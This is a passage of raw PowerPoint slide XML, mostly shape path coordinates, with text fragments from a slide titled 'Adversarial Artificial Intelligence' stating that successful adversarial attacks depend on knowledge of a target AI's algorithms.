                    <a:pt x="1822745" y="47897"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1778047" y="36866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1732818" y="27229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1687080" y="19008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1640858" y="12229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1594177" y="6914"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1547059" y="3089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1499528" y="776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1451609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444494" y="3018535"/>
              <a:ext cx="2290445" cy="4551680"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2290445" h="4551680">
                  <a:moveTo>
                    <a:pt x="72135" y="4408932"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="44529" y="4415256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22256" y="4431141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7556" y="4454241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2666" y="4482211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8991" y="4509817"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24876" y="4532090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47976" y="4546790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75945" y="4551680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103552" y="4545355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125825" y="4529470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140525" y="4506370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142595" y="4494530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74421" y="4494530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73659" y="4466082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142185" y="4464305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139090" y="4450794"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123205" y="4428521"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100105" y="4413821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72135" y="4408932"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2290445" h="4551680">
                  <a:moveTo>
                    <a:pt x="142185" y="4464305"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="73659" y="4466082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74421" y="4494530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142902" y="4492776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145414" y="4478401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142185" y="4464305"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2290445" h="4551680">
                  <a:moveTo>
                    <a:pt x="142902" y="4492776"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="74421" y="4494530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142595" y="4494530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142902" y="4492776"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2290445" h="4551680">
                  <a:moveTo>
                    <a:pt x="140239" y="58837"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="142747" y="73151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139502" y="87362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184403" y="88518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295655" y="96900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405256" y="110998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="513206" y="130175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="619125" y="154686"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="723138" y="184276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="824864" y="218693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="924178" y="257937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1021206" y="301751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1115694" y="350138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1207389" y="402971"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1296161" y="459866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1382140" y="520953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1464817" y="585977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1544319" y="654812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1620392" y="727455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1692909" y="803528"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1761616" y="882903"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1826640" y="965708"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1887727" y="1051560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1944751" y="1140460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1997455" y="1232153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2045715" y="1326641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2089530" y="1423669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2128773" y="1523111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2163191" y="1624964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2192654" y="1728851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2217166" y="1834768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2236342" y="1942591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2250313" y="2052319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2258694" y="2163444"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2261616" y="2276221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2258694" y="2388869"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2250313" y="2499994"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2236342" y="2609468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2217039" y="2717291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2192654" y="2823210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2163191" y="2926969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2128773" y="3028696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2089530" y="3128010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2045715" y="3225038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1997455" y="3319399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1944877" y="3411093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1887981" y="3499866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1826894" y="3585718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1761997" y="3668395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1693290" y="3747770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1620773" y="3823843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1544827" y="3896359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1465452" y="3965321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1382776" y="4030218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1297051" y="4091304"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1208277" y="4148201"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1116710" y="4201033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1022350" y="4249420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="925448" y="4293234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826007" y="4332478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="724407" y="4367022"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620521" y="4396613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="514730" y="4421124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="407034" y="4440555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297433" y="4454525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186308" y="4463161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142185" y="4464305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145414" y="4478401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142902" y="4492776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188467" y="4491608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300989" y="4482846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="411988" y="4468622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="521080" y="4448937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="628395" y="4424172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="733551" y="4394073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="836548" y="4359148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="937132" y="4319270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1035303" y="4274820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1130934" y="4225798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1223771" y="4172330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1313560" y="4114546"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1400428" y="4052697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1484121" y="3986783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1564513" y="3917061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1641475" y="3843654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1714880" y="3766566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1784477" y="3686048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1850135" y="3602228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1911984" y="3515359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1969642" y="3425316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2022855" y="3332353"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2071751" y="3236849"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2116201" y="3138551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2155825" y="3037840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2190622" y="2934843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2220467" y="2829560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2245232" y="2722244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2264664" y="2613152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2278760" y="2502154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2287269" y="2389504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2290064" y="2275459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2287269" y="2161286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2278633" y="2048637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2264409" y="1937639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2244979" y="1828418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2220086" y="1720977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2190368" y="1615693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2155443" y="1512569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2115566" y="1411859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2071242" y="1313561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2022220" y="1217929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1968753" y="1125092"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1911095" y="1035050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1849119" y="948054"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1783206" y="864235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1713483" y="783843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1640077" y="706754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1562989" y="633222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1482470" y="563499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1398651" y="497713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1311655" y="435863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1221613" y="378205"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1128648" y="324738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1033017" y="275716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="934719" y="231393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="833881" y="191515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="730884" y="156844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="625475" y="126873"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="518159" y="102108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="408939" y="82676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297814" y="68452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185165" y="59943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140239" y="58837"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2290445" h="4551680">
                  <a:moveTo>
                    <a:pt x="73151" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="45237" y="4891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22145" y="19605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6268" y="41915"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="69596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4891" y="97492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19605" y="120554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41915" y="136425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69595" y="142748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97492" y="137856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120554" y="123142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136425" y="100832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139502" y="87362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70992" y="85598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71754" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139943" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137856" y="45237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123142" y="22145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100832" y="6268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73151" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2290445" h="4551680">
                  <a:moveTo>
                    <a:pt x="71754" y="57150"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="70992" y="85598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139502" y="87362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142747" y="73151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140239" y="58837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71754" y="57150"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2290445" h="4551680">
                  <a:moveTo>
                    <a:pt x="139943" y="57150"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="71754" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140239" y="58837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139943" y="5715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44745" y="321792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75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444745" y="321792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444745" y="692277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599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199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599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E9AEA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444745" y="692277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599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599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199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599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354573" y="4299965"/>
              <a:ext cx="459105" cy="457200"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="459104" h="457200">
                  <a:moveTo>
                    <a:pt x="229362" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="183153" y="4644"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140106" y="17966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101147" y="39045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67198" y="66960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39185" y="100793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18032" y="139624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4662" y="182533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="228600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4662" y="274666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18032" y="317575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39185" y="356406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67198" y="390239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101147" y="418154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140106" y="439233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183153" y="452555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229362" y="457200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275570" y="452555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="318617" y="439233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="357576" y="418154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="391525" y="390239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419538" y="356406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="440691" y="317575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454061" y="274666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="458724" y="228600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454061" y="182533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="440691" y="139624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419538" y="100793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="391525" y="66960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="357576" y="39045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="318617" y="17966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275570" y="4644"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229362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354573" y="4299965"/>
              <a:ext cx="459105" cy="457200"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="459104" h="457200">
                  <a:moveTo>
                    <a:pt x="0" y="228600"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4662" y="182533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18032" y="139624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39185" y="100793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67198" y="66960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101147" y="39045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140106" y="17966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183153" y="4644"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229362" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275570" y="4644"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="318617" y="17966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="357576" y="39045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="391525" y="66960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419538" y="100793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="440691" y="139624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454061" y="182533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="458724" y="228600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454061" y="274666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="440691" y="317575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419538" y="356406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="391525" y="390239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="357576" y="418154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="318617" y="439233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275570" y="452555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229362" y="457200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183153" y="452555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140106" y="439233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101147" y="418154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67198" y="390239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39185" y="356406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18032" y="317575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4662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337809" y="5819393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599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199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599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337809" y="5819393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599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599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199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599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207000" y="306451"/>
            <a:ext cx="584263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10">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Adversarial</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-135">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="65">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Artificial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75">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Intelligence</a:t>
            </a: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73652" y="760476"/>
            <a:ext cx="8100059" cy="36575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463921" y="5660263"/>
            <a:ext cx="8829675" cy="199326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04850" marR="5080">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Successful</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="35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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>adversarial</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="25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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-1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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>mostly</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="2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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>depend</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="15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0">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-1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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>knowledge</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="2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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-565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44484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15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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>algorithms</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="15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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>used</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="220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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>by</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-5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44484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5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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>target</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-2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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>AI.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300">
              <a:latin typeface="Microsoft Sans Serif"/>
              <a:cs typeface="Microsoft Sans Serif"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="1218565">
              <a:lnSpc>
                <a:spcPct val="100499"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="20">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Security </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="114">
                <a:solidFill>
                  <a:srgbClr val="44484E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5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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>machine</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="25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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>learning</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="15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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
